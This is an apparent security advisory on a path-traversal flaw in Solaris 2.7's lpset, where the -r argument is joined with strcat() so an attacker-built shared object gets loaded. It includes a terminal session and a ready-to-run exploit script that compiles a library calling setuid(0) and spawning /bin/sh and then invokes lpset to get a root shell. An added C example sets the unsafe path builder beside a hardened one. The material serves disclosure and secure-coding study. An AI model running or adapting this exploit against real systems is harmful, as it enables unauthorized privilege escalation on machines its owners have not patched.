COMMAND

    lpset

SYSTEMS AFFECTED

    Solaris/SPARC 2.7

PROBLEM

    noir posted the following.  lpset seems to use strcat() to  build
    the library path  from the -r argument  (giving, for example,
    /usr/lib/print/lib/../../../../tmp/foo) and then appends .so to the
    end.  In this case /tmp/foo.so gets dlopen()ed; the one special case
    is  that the  /usr/lib/print/lib directory  has to  exist.  Exploit
    shell script is attached.

        $ uname -a
        SunOS karate 5.7 Generic_106541-07 sun4u sparc SUNW,Ultra-5_10
        $ id
        uid=118(noir) gid=120(boha)
        $ cd /tmp
        $ cat > foo.c
        #include <stdlib.h>
        #include <unistd.h>
        void
        _init(void)
        {
        setuid(0);
        system("/bin/sh");
        }
        ^C$ /usr/local/bin/gcc -fPIC -c foo.c -g -DSOLARIS -Wall
        $ ld -G -o foo.so foo.o -ldl
        $ lpset -n xfn -r /../../../../tmp/foo foo
        # id
        uid=0(root) gid=120(boha)
        #
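    The path construction described above, side by side with a hardened
    form, as an added example.  This is not lpset's source code and not
    noir's code; it reproduces only the strcat() pattern the advisory
    describes.  The directory /usr/lib/print/lib and the .so suffix are
    taken from the advisory; the 256-byte buffer, the function names and
    the name-validation rules are assumptions about a safe design.

```c
#include <stdio.h>
#include <string.h>

/* Directory and suffix as given in the advisory. */
#define RESOLVER_DIR    "/usr/lib/print/lib"
#define RESOLVER_SUFFIX ".so"

/* Pattern the advisory describes: the -r argument is concatenated into
 * the path unchanged, so a name beginning with "/../" walks out of
 * RESOLVER_DIR and the resulting file is handed to dlopen().  The only
 * thing added here is a length check so the demonstration itself cannot
 * overrun `out`; the traversal is left intact on purpose. */
int build_resolver_path_unsafe(const char *name, char *out, size_t outlen)
{
    if (strlen(RESOLVER_DIR) + strlen(name) + strlen(RESOLVER_SUFFIX) >= outlen)
        return -1;
    strcpy(out, RESOLVER_DIR);
    strcat(out, name);            /* attacker-controlled, may contain "/.." */
    strcat(out, RESOLVER_SUFFIX);
    return 0;
}

/* Hardened form (assumed design): a resolver is named by a bare module
 * name, so anything that is not [A-Za-z0-9_-] is rejected before the
 * path is built, the separator is supplied by the program rather than
 * the caller, and snprintf() bounds the write.  A privileged program
 * would additionally verify the final path with realpath() and stat()
 * (owner root, not world-writable) before calling dlopen(). */
int build_resolver_path_safe(const char *name, char *out, size_t outlen)
{
    size_t i, n = strlen(name);
    int r;

    if (n == 0 || n > 64)
        return -1;
    for (i = 0; i < n; i++) {
        char c = name[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '_' || c == '-'))
            return -1;            /* rejects '/', '.', and everything else */
    }
    r = snprintf(out, outlen, "%s/%s%s", RESOLVER_DIR, name, RESOLVER_SUFFIX);
    if (r < 0 || (size_t)r >= outlen)
        return -1;
    return 0;
}

/* Check helpers: 1 if the builder accepts `name` and yields `expected`. */
int unsafe_path_equals(const char *name, const char *expected)
{
    char buf[256];
    return build_resolver_path_unsafe(name, buf, sizeof buf) == 0 &&
           strcmp(buf, expected) == 0;
}

int safe_path_equals(const char *name, const char *expected)
{
    char buf[256];
    return build_resolver_path_safe(name, buf, sizeof buf) == 0 &&
           strcmp(buf, expected) == 0;
}

int safe_accepts(const char *name)
{
    char buf[256];
    return build_resolver_path_safe(name, buf, sizeof buf) == 0;
}

int main(void)
{
    /* Constructed inputs: the legitimate resolver from the advisory's
     * command line, and the traversal argument it used. */
    const char *names[] = { "xfn", "/../../../../tmp/foo" };
    char buf[256];
    size_t i;

    for (i = 0; i < sizeof names / sizeof names[0]; i++) {
        if (build_resolver_path_unsafe(names[i], buf, sizeof buf) == 0)
            printf("unsafe: %-24s -> %s\n", names[i], buf);
        if (build_resolver_path_safe(names[i], buf, sizeof buf) == 0)
            printf("safe:   %-24s -> %s\n", names[i], buf);
        else
            printf("safe:   %-24s -> rejected\n", names[i]);
    }
    return 0;
}
```

    The unsafe builder turns "/../../../../tmp/foo" into
    /usr/lib/print/lib/../../../../tmp/foo.so, which the kernel resolves
    to /tmp/foo.so as long as /usr/lib/print/lib exists (hence the
    advisory's special case); the hardened builder never lets a
    separator reach the path at all.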

    lpset shell script:

    #!/bin/sh
    #
    # /usr/bin/lpset vulnerability in Solaris/SPARC 2.7
    # script by noir@gsu.linux.org.tr
    #
    # lpset seems to use strcat to append paths (-r)
    # but there is a special case /usr/lib/print/lib has to be present
    #
    
    # write the shared object source (file name matches the gcc/ld lines below)
    cat > noir.c << EOF
    #include <stdlib.h>
    #include <unistd.h>
    void
    _init(void)
    {
        setuid(0);
        system("/bin/sh");
    }
    EOF
    
    echo "Compiling ..."
    
    gcc -fPIC -c noir.c -g -DSOLARIS -Wall
    ld -G -o noir.so noir.o -ldl
    
    chmod 755 noir.so
    
    rm -f noir.c
    rm -f noir.o
    
    # -r argument is appended to /usr/lib/print/lib and suffixed with .so
    /usr/bin/lpset -n xfn -r /../../../..$PWD/noir noir

SOLUTION

    Patch in progress.